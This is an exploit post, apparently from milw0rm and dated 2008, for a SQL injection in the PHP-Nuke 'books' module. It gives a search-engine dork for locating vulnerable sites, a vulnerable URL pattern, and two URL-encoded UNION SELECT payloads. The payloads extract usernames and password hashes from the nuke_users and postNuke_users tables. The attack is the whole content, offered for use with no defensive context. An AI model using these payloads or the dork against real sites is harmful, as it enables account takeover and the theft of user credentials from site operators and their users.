############################################################### # # PHP-Nuke Module books SQL Injection(file) # ############################################################### # # AUTHOR : S@BUN # # HOME 1 : http://www.milw0rm.com/author/1334 # # MAİL : hackturkiye.hackturkiye@gmail.com # ################################################################ # # DORK 1 : allinurl: modules-php-op-modload "req view_cat" # ############################################################### example http://www.xxxx/modules.php?op=modload&name=books&file=index&req=view_cat&cid= {exploit} EXPLOIT 1 : -90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(111,112,101,114,110,97,108,101,51),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2Fnuke_users/*where%20admin%201=%201 EXPLOİT 2 : -90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(121,122,111,104,110,97,112,101,54),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2FpostNuke_users/*where%20admin%201=%201 ################################################################ # S@BUN i AM NOT HACKER S@BUN ################################################################ # milw0rm.com [2008-02-18]